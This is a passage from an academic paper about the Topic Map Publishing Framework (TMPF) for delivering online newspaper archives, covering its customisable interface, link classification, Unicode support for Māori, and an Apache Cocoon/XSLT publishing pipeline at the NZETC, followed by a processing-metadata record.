behaviour is a key part of the specification of the Topic Map standard and is a built-in feature of the topic map metadata repository component of TMPF. In general ease of use is the result of a well thought-out and robust system architecture that lies beneath the interface. This is a characteristic of TMPF which provides a 100% customisable interface providing complete control over the delivery system’s look and feel. In designing the interface of TMPF for newspaper delivery we aimed for something which is uncluttered, requires minimal keying and clicking, and minimal opening of new windows. TMPF accommodates context sensitive help by assigning help documentation to any topic in the system. Help can be authored as one or more XML documents and linked to the relevant part of the system by adding subject classification metadata (i.e. the help document is itself tagged as being “about” a class of topic, such as monthly publication histories, newspaper issues, articles, pages, etc.) TMPF allows the use of regular web browser features as users expect. TMPF does not encode session identifiers in URLs, which is a common obstacle to bookmarking. In TMPF, the URLs of web pages are entirely independent of the storage and retrieval mechanism for content. TMPF can be configured to use web page URLs conforming to any desired convention. Other potential obstacles to regular navigation involve client-side JavaScript for linking and the use of frames and pop-up windows. Though TMPF does not prevent the use of these techniques, TMPF has not used them and does not generally recommend them. The TMPF interface is completely customisable and supports integration of links to other services. Such links may also be classified into different types (e.g. “further reading,” “discussion forums,” “annotations,” etc.), and each type of link presented independently. These links may be further classified in various ways: - by access/visibility (e.g. “public,” “internal,” “QA”) - by perspective (e.g. “historical,” “geographical”) - by provenance (“scholarly,” “user-contributed,” “Te Puna,” “Te Papa,” “Ministry of Culture and Heritage”) - by natural language (e.g. “English,” “Māori”) Multiple user interfaces can present filtered views of these links appropriate for particular audiences. TMPF is built out of XML-based components; hence it is based entirely on Unicode. This provides the ability to represent all characters in Māori and other Polynesian languages. As for our TMPF production system at the NZETC, we used Apache Cocoon to transform the XML texts created by APEX into readable documents using XSLT stylesheets. Cocoon can deliver documents in a variety of formats, including HTML, PDF, RTF, SVG, JPEG, PNG, and any other XML-based format. We can also integrate software to produce Microsoft’s eBook Reader format. Cocoon can perform these transformations on demand; i.e. when a request is received from a web browser. Each request is handled by reading the appropriate XML document or documents, and processing the XML data in a succession of stages, first applying logical, then presentational transformations. Each stage is distinct and can be effectively managed by different people. Our web designer can edit the look of the site, the web developer can edit the structure of the site, and the text-editors can edit the content of the site (the e-texts), all independently of each other. To install a new text, the editors can simply upload the XML document and associated image files into the webserver via FTP. The document will then be automatically converted to HTML and divided into separate pages for each chapter, and scaled-down thumbnail versions of the JPEG graphics will be created using the XML graphics format SVG. To change the overall look of the site, the web-designer can upload new design elements such as CSS stylesheets, new versions of the logo, navigation menu, etc, in the same way. When a document is displayed to the reader, the content will be automatically inserted into this new design. Apache Cocoon is a Java servlet and hence it can be deployed on a wide variety of systems. At the NZETC we run Cocoon inside the Apache Tomcat servlet container (the official reference Implementation for the Java Servlet specification), using JVM version 1.4 from Sun Microsystems. Conclusion There are currently numerous large projects going on around the world which aim to create online newspaper archives. So far, much of the public, technical discussion around these projects has focused on the digitisation process – the use of microfilm for scanning, OCR requirements and techniques, file naming conventions, image format choices, storage strategies, and so on. Since the imperative for digitisation is often as much about preservation as it is about access, this is not surprising. However the delivery of content from the newspaper archive to users is a similarly important process which requires a similar level of commitment to technical research and development if it is to be successful. Of course the successful delivery of newspaper content over the web is predicated on the existence of a high quality, well-structured digital collection which to deliver. No amount of sophisticated search algorithms, novel browsing functionality or intuitive interface design can compensate for inaccuracy transcribed text, poor quality images or inaccurate metadata. But it is equally true that the impact and usefulness of even the most interesting, high-quality content will be diminished if that content is not discoverable, navigable and presented in a way that meets user needs. The TMPF has been developed within academic communities and has not enjoyed the benefits of high-level marketing and promotional efforts. However the semantic framework that it applies to the newspaper domain presents a possible means to fulfill some of the complex requirements which must be met to ensure the successful online delivery of a newspaper archive.
{"Source-Url": "http://researcharchive.vuw.ac.nz/bitstream/handle/10063/63/paper.pdf?sequence=2", "len_cl100k_base": 7118, "olmocr-version": "0.1.53", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 33206, "total-output-tokens": 7430, "length": "2e12", "weborganizer": {"__label__adult": 0.00036406517028808594, "__label__art_design": 0.0026950836181640625, "__label__crime_law": 0.0007352828979492188, "__label__education_jobs": 0.012451171875, "__label__entertainment": 0.0006499290466308594, "__label__fashion_beauty": 0.00028705596923828125, "__label__finance_business": 0.001773834228515625, "__label__food_dining": 0.00048661231994628906, "__label__games": 0.0006155967712402344, "__label__hardware": 0.0021724700927734375, "__label__health": 0.0004320144653320313, "__label__history": 0.004245758056640625, "__label__home_hobbies": 0.00025916099548339844, "__label__industrial": 0.0006566047668457031, "__label__literature": 0.0031414031982421875, "__label__politics": 0.0007257461547851562, "__label__religion": 0.0006031990051269531, "__label__science_tech": 0.1817626953125, "__label__social_life": 0.00033283233642578125, "__label__software": 0.37451171875, "__label__software_dev": 0.40966796875, "__label__sports_fitness": 0.00025725364685058594, "__label__transportation": 0.0008025169372558594, "__label__travel": 0.00052642822265625}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 35047, 0.0072]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 35047, 0.42095]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 35047, 0.92773]], "google_gemma-3-12b-it_contains_pii": [[0, 3270, false], [3270, 8009, null], [8009, 11996, null], [11996, 13066, null], [13066, 15159, null], [15159, 17825, null], [17825, 21071, null], [21071, 24156, null], [24156, 24717, null], [24717, 27733, null], [27733, 31891, null], [31891, 35047, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3270, true], [3270, 8009, null], [8009, 11996, null], [11996, 13066, null], [13066, 15159, null], [15159, 17825, null], [17825, 21071, null], [21071, 24156, null], [24156, 24717, null], [24717, 27733, null], [27733, 31891, null], [31891, 35047, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 35047, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 35047, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 35047, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 35047, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 35047, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 35047, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 35047, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 35047, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 35047, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 35047, null]], "pdf_page_numbers": [[0, 3270, 1], [3270, 8009, 2], [8009, 11996, 3], [11996, 13066, 4], [13066, 15159, 5], [15159, 17825, 6], [17825, 21071, 7], [21071, 24156, 8], [24156, 24717, 9], [24717, 27733, 10], [27733, 31891, 11], [31891, 35047, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 35047, 0.11579]]}
olmocr_science_pdfs
2024-12-11
2024-12-11